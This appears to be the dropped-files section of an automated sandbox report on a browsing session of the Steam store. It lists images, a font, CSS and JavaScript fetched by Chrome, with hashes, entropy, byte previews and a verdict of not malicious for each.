        MD5:0A92B65486A8BF947B39DC356FF27CAE
        SHA1:84F83D56A5E3896E4EFC30F6D3C29001B182A3F7
        SHA-256:897C25E44AD6AA7E69713F07D253662906F4D3BCD32F5A4097B324D8F7037FBD
        SHA-512:E65CE449C0CE68A598D560CB44FE6012517073321A31B24D42E206201A7281880AB1BC3A25DEDFFA0DCE7806D3C5F8F304BE252DAA9C72ABFAC73369E415502F
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/1245620/ss_c97bcad291f4f45d4be4594f34bd78921d961099.600x338.jpg
        Preview:......JFIF.............C....................................................................C.......................................................................Q.X............................................R.........................!.1.AQ."aq..2....#B..3Rbr....4.$5...6Cstu..c..%&ST.....................................9.......................!1.A."Q.aq..2........#B3R$r..C..............?..g....]S...*.?.V.A...j.L.y...P.~.....J!......E.@l.P....j.,E9..W....bQ.~.... ........q.......R.c.<D..*..,5M..!.....QFi2..1.....W.v#.|."...R.m.C........:T..6..f....x......g..4..\.....w.....;.kt-+A..........K..lh".y...F.@...2...'...I..i6..GT...{.M.).._?..m..U..BY`.%h.lN9a..ri.".....5i7.`G.Ojtg.....o.R.3..{.q..VukR..gL{~....U..B..w..Y#ZM..]ZKp!..`.a..H??.P,i...4.......eeIP..:...jb.JC...Z.U.X...f ....>T...~Q.s*jE...].....vE...J.m.$...U....l.$Res..8....[..%..+..)py.r.<b.I.Z.ym.K....1.K..t}..B....].......K..*..C..y.0r+....9m..(G$w8GS.a.nJ.d2.....+.a..c......>.h..F .|..b..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 20 x 20, 8-bit/color RGBA, interlaced
        Category:dropped
        Size (bytes):1249
        Entropy (8bit):6.642855988979977
        Encrypted:false
        SSDEEP:24:+y1he91Wwjx82lY2T3ouVztN9ZDyJ3V9C9TEGJe52Xe7b2H:+wqQNn2xFtl+J3bQEJB2H
        MD5:1048839EDE1F4EFCC80132BCF80A29AC
        SHA1:4C672A862F1FC12C3554FA7B18D0BE10422185EB
        SHA-256:3D124B4A837A8BEA80EA42BD7C3D75ABA32ED95DC51660C7889D8C0C815BB98A
        SHA-512:A3CF2719184497825BFD6B02395AE94ABC9D7D77A6F3C065D91A0364988B7730ED827D0156A233BFE1F9FDCFAF5C9FC99F3E2B874DB3F797069FCC29B728BE8C
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR...............-.....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:A40180EEA29F11E6B2A5DB9CBD1A320A" xmpMM:DocumentID="xmp.did:A40180EFA29F11E6B2A5DB9CBD1A320A"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A40180ECA29F11E6B2A5DB9CBD1A320A" stRef:documentID="xmp.did:A40180EDA29F11E6B2A5DB9CBD1A320A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..DR...UIDATx.b...?..0..FF..p..T....b.)c.b.. ...@..&..$...|.U..... F4...$...gB...od.....L.b-.........e.@..E.Ia#.._..@W.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 184x69, components 3
        Category:dropped
        Size (bytes):11267
        Entropy (8bit):7.953108578270147
        Encrypted:false
        SSDEEP:192:rjTLdXTOdJtJKcwI9l9kXib1Fr0VgUqTdMxbb2vX2nZMUZUJsoZQEi6/XFhQOL7:pOdJtEcT8Xi7rXTTixvtvUJzZriuVhD7
        MD5:763D471AB4E7E1A431307D1AEF439DD3
        SHA1:9C439202DA24B72AA0FEEF0CEC0D0C55D11A3224
        SHA-256:CE114A269899D7DC044CFB75F7E13951950C8B6769AEC144A31A3EB202191FF3
        SHA-512:351EE2E35CF971BC362A717755DE52F482B1E1C026F9C67110FB52DDF5B346FDCCFAD08B7A5622F7CCD30DA8F1CB918228F3568391447E10BA5502414A0E28BB
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................E............................................9..........................!..1"A..2Qa#q.BR...b.$3r......................................9.........................!1AQa."q........#2B...Rb..r...............?......(.Mm...o.]}..S..../.qh2...c*-..V.......K.....:.o..9...S6.qt..$.U?3.......0..5.W.x9I...1qmF..FV..k@......n..AR......!.L(.k=U....J..~V3.7.B.e.~...X..H`|....:...I.?..c.G^..)....R.p.$.L..c.+.V&PUO..tF. ..&.2.?Q.]|hGp...). .....PG!...98.h...+..).......G...K..#.H<.d.....rK.8...T.M..aP.Y=...eK.. .....tz......5..}....O.~t..s.N.....%i.\...2....|....P{B.\*&|.Q.U.g.SYP ..".mv.i.;.h.N.n..F.>..#.G]6.i.a.7...=.evo-.t).Z&..~C.x.mkB"xq.\Op.O.....=.<|....P.[...s...p.b..2B.A........8O..../......:.n) Um..........+1l..o:..=f..x..}.....5.SV.?.Z8oY...-.)....|.l.....F..n........d)I.]....$.w...m....Va..e?.n..X...
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 115x65, components 3
        Category:dropped
        Size (bytes):3184
        Entropy (8bit):7.851378513683785
        Encrypted:false
        SSDEEP:96:vpMecErza5+2fX0AkCJv1tHfkX8LfGUz0Olp8Rj:BMejekStHcX8LsOcR
        MD5:55703EA03F58BCA601EED350A8EA23E2
        SHA1:5DD3C09D13023E6FD1CF403E9734510D5E070818
        SHA-256:510604171D38FAFBEE54C5FE06965AB89B11AF85DAF0DCFE0FBA6355B8A717C4
        SHA-512:D3D637B3C59F00C104CE1B5EA2B6E0A077C9A38416FFBE4A9378A5FE477210CA625213D876EC82A94D7565C44B81AE346DD732C684532B906BBABB07516F971B
        Malicious:false
        Reputation:low
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................A.s...........................................=.........................!.1A.."Qa..2q.#3.....4Br.5b.Rs...................................-.....................!..1.AQa."q.....2B................?..d..`z.m.mi.jJ7.g*X....._.n~F0....pF......d...$...Y..za.D....H.......%.no[OP.....^DX9Gh.S0J..Z..old.....e.YCP..H....x.Z...<W.&dRuD%..&.>~x.:[.H."....@.G3|h._...aI......&]F9.......*......S.P/..9...X..}....................'......-......c.^.g.M....!...L.o.d.p1i....%O#o\Z`<....J..q@H).j...J....Qd..w.F....P..X...,M.&+.S",..z...yc....Q.RY.^..q..,.d./....#K.\.h....|>D..d.].K}.I....DW:...VZp).|)....s.;.D6n3.iX..$....Ag%Qp.u[.1.nv.Y&.z.*.@...."O.I.D.5F8.jgb...\b........8j....b.u,.u#.0A..C..&..j.h...R.b.....;.X...:**.......@....(..-.(.IX%..Pu..a......u'..kaS.G.f.B.c...@R.!}lq..B....4........d.....<..B.....
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 1390 x 193, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):28761
        Entropy (8bit):7.956794711428168
        Encrypted:false
        SSDEEP:768:bodkz+z4HbKXqgAU7wuf8B/Ae12VG/upRxXfs7+l71Dy:bEkvHbFxuZde12VC+RBy
        MD5:87B2AB4415E46243280A14E3E1314DF1
        SHA1:2B10D735062A20209E18AA684F694A9CDF03078D
        SHA-256:74F45C566B9F41FEC717033D6D420EAF6E91F61D9DADDE5B1A6220D2E86732D0
        SHA-512:CFFC250B0003D94E9D7783149B3D23810ECBBEF351D0279BBF16ED57CFF843B92FC6144DEDD1711CDA3AE578DA6410F2BC8CEEE67C7980A522B9DF4CF8F30DD5
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/images/v6/app/game_page_background_shadow.png?v=2
        Preview:.PNG........IHDR...n........._F).....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:7A252E10210811E5A820F2520D688752" xmpMM:DocumentID="xmp.did:7A252E11210811E5A820F2520D688752"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:7A252E0E210811E5A820F2520D688752" stRef:documentID="xmp.did:7A252E0F210811E5A820F2520D688752"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>"..w..l.IDATx..}k...q...<j.5.GO..n...}.Y.y....'s/...$[a..3...........TYT..p.{rO..r^.>.4-..-?.m......sl?{....?q..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (1471), with CRLF line terminators
        Category:downloaded
        Size (bytes):28002
        Entropy (8bit):5.073431410521597
        Encrypted:false
        SSDEEP:192:9OHY8Qv//VRltYLL4fbVCGYdV79a3vRORkFfpna1jy2S/KcAQ/3hDF9nKhx2IZEu:9OH0v7/fbfja1vSxjJYYA
        MD5:7E5070A2411567689425E6A63A99D292
        SHA1:595A1D703878FC350BF6C06D70E8B91736688C36
        SHA-256:6473554529200D736534469F1EF99DEE4B3F25E9E3B72419CE66672EF2CD7C90
        SHA-512:E05DD297E347820777CD083C2EFFC25A52FC7375DC5E6D4A3050F9D44BDCD3B6AD3B9A8C3E5576C5237F3EDA81A569B68182B025F50B82D35B4DE92F7F2B9FD5
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/shared/css/ui-lightness/jquery-ui-1.7.2.custom.css?v=.23LkAmA0IgZV&_cdn=cloudflare
        Preview:../*..* jQuery UI CSS Framework..* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)..* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses...*/..../* Layout helpers..----------------------------------*/...ui-helper-hidden { display: none; }...ui-helper-hidden-accessible { position: absolute; left: -99999999px; }...ui-helper-reset { margin: 0; padding: 0; border: 0; outline: 0; line-height: 1.3; text-decoration: none; font-size: 100%; list-style: none; }...ui-helper-clearfix:after { content: "."; display: block; height: 0; clear: both; visibility: hidden; }...ui-helper-clearfix { display: inline-block; }../* required comment for clearfix to work in Opera \*/..* html .ui-helper-clearfix { height:1%; }...ui-helper-clearfix { display:block; }../* end clearfix */...ui-helper-zfix { width: 100%; height: 100%; top: 0; left: 0; position: absolute; opacity: 0; filter:Alpha(Opacity=0); }....../* Interaction Cues..----------------------------------*/...ui-st
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x337, components 3
        Category:dropped
        Size (bytes):94915
        Entropy (8bit):7.982055140976294
        Encrypted:false
        SSDEEP:1536:WJilyqpsnJNfP5JOxUtRCFz+Osly1feOTxlGk4I3dahZUWo5foeH1k+OvSIYaYIh:VyjN5JuMAgI1f1lGxadasv5fomk+OaaZ
        MD5:77C69F6163163A0C519BC5E023858131
        SHA1:B75285EDD065665E89CB0A0B32B861EDD6D4FE6B
        SHA-256:DAAD8D0B67353F3C6D94D2DE31B077A8FBB61E27F07B57E58194E6D203577106
        SHA-512:3C76D16B2BED54A946BF25F0629673935710AEDDC145D216EEBB66198636A62DC065F86A4A8BEC2D45DA354A340160DD0CAD45D440FAF3731A1C6A0D4627EC05
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................Q.X............................................P.........................!.1..AQ"aq.2...#BR....3br..$4....5C....%EScs..&6DtT..................................=.......................!.1.AQ."aq..2......#B...R.3$4r..CSb.............?..a..5.../S[...3.#v#T-...#...k.MS@.f.-.....=P...b....$..C..Q...NvC....U...zVF.a5..9L.e..j.c........Z..sd.N...J^........Iijw...............[2>...5..n...K...G..Tw..P..R.$^F.. .,.B.r........;B.d..9.......ig...Oq.u..H.P.....N5..f.C......O.l.p.F.u`.w.N..9.T ...z.L.%.h...e:.ri..+....V&...2{..V...:J#..+.OO4.....U.......+w.7.Q........B#..E...y.......@.r......iMmPy...h*8.5Z{1.Gq/r_..#......."....J.4;..........a.&e..O..i'.....a.....~.....z1#.8:T..T.....iBe......':.h.n....].\.....|.S......lX....L\l..S.6.CSD....9..T..r.z..1..5....Xu.....1nG.q..,..$.\u.+..o.....5..F.~...a..F.g.l..ujr
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 600x337, components 3
        Category:dropped
        Size (bytes):100928
        Entropy (8bit):7.984906911731841
        Encrypted:false
        SSDEEP:3072:DycblOoLgLbJDAme9W9+uSmLBFeSvnbgOd:DycblOTLbeeISvnLd
        MD5:DB8D544763D1D2EFBBDA38B49002869D
        SHA1:A1D6474F4006B0653626C60558DCEC2053501181
        SHA-256:611BB301F20152F8406722AE6BBEEB57A6E2D7049C605970E55301A5910FD3A0
        SHA-512:FB4BD1EFB4F65DE151A850CFECDFC1FD4B17AEB83D6392610390EA3FC079ADC482CA8F234250892647646229F5F914D7BDFBC343A31DE5A076043494BFB9DB08
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................Q.X............................................T........................!..1.."AQa.q..2...#BR...3br..$4...5CSs......%c.6D..T.u....................................C........................!1AQ.."aq..2.......B..#R..3C.Sbr.$...4D..............?.cALr6..(...l(..^.Q...0.vA..vc.4]9..u....E...Jpp0>gV%Y.....9...MH+...4...%....=A!M....B#B..._M,.U(..5.....0Ggt.9.:.Q..A..Jdl.4-..e.FF}4[V..%.^..C..Os....a...}.j..F.5:..(.|.Z..j..+....\.....Y.C.R........f.U:....T.P...KYF.4.:j9.9.c.'.z....{K...d.bg.D...5.n.....PPV.i..!P.l..uW........Df....|.W....`...U.6.X..7.z..I...$.2.V....'T..,._.......M.....R..yd.r....$..6.s...g.1..El.R@@..L.N...o.Q.)..^.....nV......+..$...@:..........g.|Z....'V)$..%y.f._3....+.Q*:X. ...G....|.......U...<...+........p.w^Ps.?.RFr...EqY.Z6.H......XH...."...*.........w... .Wr......5iJ.q.N
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 15 x 13, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):291
        Entropy (8bit):6.7719789082293165
        Encrypted:false
        SSDEEP:6:6v/lhPU8WnDspP8GYUQiOTmUDJcyYWm5kvrCBVreLbp:6v/78OaGYfLDBYCrCneL1
        MD5:A2796187C58C7E948159E37D6990ECC2
        SHA1:4209CD85ADD507247F9CE5A87A8C9095B54EE417
        SHA-256:23341256DB7F44B1F3811880FA2BAE6B7748BBF6B62C544A162E38CF0D5C5082
        SHA-512:5EF103B8398507495C2708DF8FCD82BDB763B1D580AAAA6CACFB805614764277C19E8ECE5D890A8AAFC004FC8C25E3AB2E67D6FBF373C432A9A0D7C36FA0890F
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/shared/images/header/btn_header_installsteam_download.png?v=1
        Preview:.PNG........IHDR.............v.4A....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b...?.......9....]@.......O.G..@...?..:!..H.....T...{.i>..Y.M...ff..W..'.._P>..!..j.......&......4.'...X.@......?.5..m7..E..X.....Eh. ...P...Q ........... ...%.......y...c..@..?i...{.....HteDtom....IEND.B`.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:TrueType Font data, digitally signed, 18 tables, 1st "DSIG", 24 names, Macintosh, Copyright \251 2012, 2017, 2020 by Plau. All rights reserved.Motiva SansThin4.015;Plau;MotivaSan
        Category:downloaded
        Size (bytes):118736
        Entropy (8bit):6.0569560995718
        Encrypted:false
        SSDEEP:1536:GAAAAAAAgsAAAYgIAAAAsAuErzzzz6mfzzVCA9zzzzzzdp/koLAGXImE98YfgNi9:kErZDE9BfgNiX9k3SDHewStfNwS0fj9
        MD5:CE6BDA6643B662A41B9FB570BDF72F83
        SHA1:87BCF1D2820B476AAEAEA91DC7F6DBEDD73C1CB8
        SHA-256:0ADF4D5EDBC82D28879FDFAAF7274BA05162FF8CBBDA816D69ED52F1DAE547F6
        SHA-512:8023DA9F9619D34D4E5F7C819A96356485F73FDDCB8ADB452F3CEEFA8C969C16CA78A8C8D02D8E7A213EB9C5BBE5C50745BA7602E0EE2FE36D2742FB3E979C86
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Thin.ttf?v=4.015
        Preview:........... DSIG............GDEF...4...,...@GPOS".j....l..j.GSUB.d....k.....OS/2t..........`cmap.d..........cvt E...........fpgm.6!.........gasp............glyf;9.........Thead.z.;.......6hhea...........$hmtxj4.w...8....locaij*V... ....maxp........... name............post.......|....prep...........................................s...t.u...v......./......... .Q...........D..DFLT..latn. .................!.:..AZE .HCAT .VCRT .dKAZ .rMOL ..NLD ..ROM ..TAT ..TRK ...............".............#.............$.............%.............&.............'.............(.............).............*........... .+.,cpsp..cpsp..cpsp..cpsp..cpsp."cpsp.(cpsp..cpsp.4cpsp.:cpsp.@cpsp.Fkern.Lkern.Tkern.\kern.dkern.lkern.tkern.|kern..kern..kern..kern..mark..mark..mark..mark..mark..mark..mark..mark..mark..mark..mark..mkmk..mkmk..mkmk..mkmk..mkmk..mkmk..mkmk."mkmk.,mkmk.6mkmk.@mkmk.J..................................................................................................................................
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):1169
        Entropy (8bit):6.53554947966358
        Encrypted:false
        SSDEEP:24:c1hfvWwh82lYSgTqVPdTT3ZyJ3VNIEGVoF5l5aK7l4ew:CAvnzqdp0J3tj5l5aIQ
        MD5:DDBF5745CFD0932E5E18C0EA271F19E7
        SHA1:D9068EDD91F4C01DDFB794AA395843FEB27493A5
        SHA-256:3735B1058C21031892C59D6B52D5F6ACD0B3FC435F7DC0F0F8B586DF29143624
        SHA-512:6D91A3D3905CD835A2936364FE871F9209924EE85DBFB4E22145018DBD2B7EC604DD9F9F7C07758A3F7FF57C6CD40B0471F15AF151D95A0D9A0A6F39D3FFCCB9
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:8CD4B3FDC8C611E793BCB6BD713023CE" xmpMM:InstanceID="xmp.iid:8CD4B3FCC8C611E793BCB6BD713023CE" xmp:CreatorTool="Adobe Photoshop CS5 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:EFB48ADB4CB311E3AB3FC1E695F5A0EB" stRef:documentID="xmp.did:EFB48ADC4CB311E3AB3FC1E695F5A0EB"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>X..G....IDATx.b...?.5..2P...X...X....8....P. ,..2@|....X.......g@,.....m@.....G.....Hf0. .....h...._@...9...&$.7jD..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:Unicode text, UTF-8 text, with CRLF line terminators
        Category:downloaded
        Size (bytes):25017
        Entropy (8bit):5.43169752987849
        Encrypted:false
        SSDEEP:384:aUXvnJo2Facv5Wc4gOVMXBGdJTZ1CFN6Px6K2UD3mt4lRyOb74jCWqGil/wSwf0m:aU/nq2Fd4gCjWqGil/wS20m
        MD5:731415F5FE35EDB73981F7F68A33C3EC
        SHA1:21F594588DAE56C93D34C91D4E6F0EF059339050
        SHA-256:FEE9C5438F2B9C6CC0BCEABA92E1E00C320981F0E51A0E5715D7059573B62F91
        SHA-512:9C0061F31062DACC9382C5809EF2DC0085DB80FA1ADEC99EA9827B1666D3F2683F2751C32177B99C2E8C82475273EA040854B7F3943D33BFBE8DE461115FF8EA
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=cxQV9f417bc5&l=russian&_cdn=cloudflare
        Preview:"use strict";....// build our menu on init..jQuery( function($) {...var mqQueryMenuMode = window.matchMedia ? window.matchMedia("(max-width: 910px)") : {matches: false};...var mqMobileMode = window.matchMedia ? window.matchMedia("(max-width: 500px)") : {matches: false};.....var $HTML = $J('html');...window.UseTouchFriendlyMode = function() {....return $HTML.hasClass( 'responsive' ) && ( mqQueryMenuMode.matches || $HTML.hasClass('touch') );...};...window.UseSmallScreenMode = function() {....return $HTML.hasClass( 'responsive' ) && mqQueryMenuMode.matches;...};...window.UseMobileScreenMode = function() {....return $HTML.hasClass( 'responsive' ) && mqMobileMode.matches;...};...window.UseTabletScreenMode = function() {....return $HTML.hasClass( 'responsive' ) && $HTML.hasClass( 'tablet' );...};...window.UseNewMobileAppMode = function() {....// the new mobile app can run on screen widths wider than responsive_css_maxwidth....return $HTML.hasClass( 'responsive' ) && $HTML.hasClass( 'rn_mobil
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:GIF image data, version 89a, 618 x 348
        Category:dropped
        Size (bytes):19465707
        Entropy (8bit):7.791039468063003
        Encrypted:false
        SSDEEP:393216:bTFXUpXoXJtBp/6kf4W4Es8nZFyqGcz9R4OH/kjX0j+:FXocb/6tWdZZcARIX0j+
        MD5:2F0527AD119884F67F4919168C986C7F
        SHA1:39CE39ADF37A6BE3FB8CE328C7E5ABB79C750C1A
        SHA-256:675CF6ECE963C633B99790AEA0D814826E757C873167792139EBCCA59AAD8880
        SHA-512:1D6B76FAABB3CB4595472622F34285066A070419CC3534AD1348CB287C7445ECB03015B94E624FBD64308F864329929B9CCFC41A5D8A54F553D544D9ADEF3479
        Malicious:false
        Reputation:low
        Preview:GIF89aj.\...1..................................................................................................................... .. .. .. .. ..!..!..!..".."..#..#..#..$..$..$..%..% .%".&".( .(".(# )$.*!.*#.+&.,# ,&!,&$-)&0% 1".1%.1&.1)&2..2'#2)"2*(3..3+$3+&3,.3, 3,"3,)4.)5.,6/&81+82.841;0-;2+<1+<3)<3/=!.=-"=0%=5-=61>83?:6@1,@6.@7-A,.A5*A71A90A:6C8,C9/C:5C;1C>9D,#D6)D<9E:1E;4E;4F4*F9/F<8F?;G9-G<9G>3G?8H>9H@>I2'I=8I@2J<+J?3J@+J@0J@5J@<LC?LFCMB7MC;N;'ND9O!.O:4OE?PHDQC.QG;QG@RHDSLHTJ?VLEWMIWPIZQJZTP]RK^UP_VKa.!aWPa\WbYOf[Nf\Pf\Qf^Xg..gVHg]Rg]TkaUkaXkc]mcXneYng`oidqgZqi^tj^ukbwnbwohysjzpc}re}sg~ti.um.xo.xl.zp.zn.{o.zm.~t.~q..y..t.wl..t..y..u..}.....y..v..y..z..{..}..~.............T1.....................................D.................................................Y..U.!..NETSCAPE2.0.....!.......,....j.\....................................................................................................................... .. .. .. .. ..!..!..!..".."..#..#..#..$..$..$..%..% .%".&".( .("
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 46 x 36, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):1290
        Entropy (8bit):6.7616543307680725
        Encrypted:false
        SSDEEP:24:Xcy1he91Wwjx82lY2T3ouVW7fyJ3VtZS4GA3FdLZCJurYUgQVI1L12Kz+9:swqQNn2x1J3Jpr3FdIJzQaRz+9
        MD5:CB06992B64D4961EDE5F7DA47804DE5C
        SHA1:228FD206FB76B5A05FBF36B61C8E4E4749D534D0
        SHA-256:61405865FDC0F0B1B658B0AA3098B9676A5E6D7D88403945269497B10D0EBD78
        SHA-512:0B1709FF9B3C6CD8D5ABE177C543835A2004E7C8EDCC9B8EBB2D2B5036CBB0059E5B0409A69DC721B98EF98BE2C61E01C0A8B3BC12E7B87A22561B39C9257501
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR.......$......".Q....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:9301916979CC11E6BFE9CE978F5FF8DD" xmpMM:DocumentID="xmp.did:9301916A79CC11E6BFE9CE978F5FF8DD"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:9301916779CC11E6BFE9CE978F5FF8DD" stRef:documentID="xmp.did:9301916879CC11E6BFE9CE978F5FF8DD"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......~IDATx....A../J.J...x.=j.)uTj./@<.R(TZ.G@!.5.[......{.L2....\nog.Q.B..C. ;.'!Y.S.[.<.W\ ..@w..Pl..6.Y..Lx.}K
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 184x69, components 3
        Category:dropped
        Size (bytes):7145
        Entropy (8bit):7.923638168414437
        Encrypted:false
        SSDEEP:192:m9LKvrLGof2DzZzAzDTmIkVyeQk47/p704:m98nGOkMw0eQk47/d04
        MD5:FB78B9985A1EC14E13430F820CC5905D
        SHA1:A7AD4949F4E3CF08159F989A2911BB9EB19BF442
        SHA-256:D5FA07A7BF1F26CF2EF9DA95967F54AA4B1B5FB662C1BEF13212FDF5AD304F0A
        SHA-512:07E3AA19F560C70B8EC9E06C1A1AE9B67C3B920C6841A1953888E276CE9748989CE2271F82D9D8C340E5DE7E122B7C39899A9375F047630179BD3A0212B8EDF4
        Malicious:false
        Reputation:low
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................E...............................................=...........................!1..A."Qaq..#2..BR..$s.34S...r...................................6.......................!.1.AQa..q."....2...#BRb................?...#..-.hB. ..!l.J....D..........d..?5.Hyj!hI..I.=s.Bpf.b+.j..1..0.G~....*F.Rwc..[Z....2... .#H.&.w1.....@.pW.Cg.R....<..vBb.......R3..DBi].Ly.....F. .. .!....TZ9\.A8. .#.3...$K..B....]?.@...2:.5....0z.Q..%.z.5(.....DB.Q..e,-Ju(..I....:...D.}.R...D.8..../.I...!G..O.B....r..*.v...k....F...=.... ......K..Z........U.x..lEGq..[ c=.q....@.&..].....zS.mHI..'8)...\.A...L.U..u.M3...\b.q....Y*Y.#..Lw'J..VB...'...#k..)..$..gL..]..>..-.=B.I?bA..)n.)..mP.m*W.Jl..I.......J.mkR..LN......h.f+..-...2.....'<@..'..Z.w........\2..=4~-#S.q...RJ&F...]....st.>..bT.._'..6.TG.q.lu.......r. )I...$.......1.....$'.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 115x65, components 3
        Category:downloaded
        Size (bytes):3433
        Entropy (8bit):7.856904024409769
        Encrypted:false
        SSDEEP:96:v0GN/ZjBwU8IilvcG7Got/8WAF0eHTPegO1NX9pCHi6j:LxZjBLiNZ7Got/8W081M
        MD5:3F6805E931482F914739F2CDFAA7C31C
        SHA1:E3394B9DE41DF496B6221C9B3A8DA8869EA1F35B
        SHA-256:9FB42C5D67CCCAB85E0B57D91BE8D61BE85B553D828DCE7677BCEEAACC102141
        SHA-512:C07E610014755FD0208FE62A34822BDD4EFEAC70BAF38911697AC4DEA5D12E3BBADB6B6206D9E635EEA633EA693E5091D34158E04D63DF55629E76E48136726F
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/1643320/ss_9e6718fbf965951c519a1fbe300bcfce85b2ea2f.116x65.jpg?t=1705420866
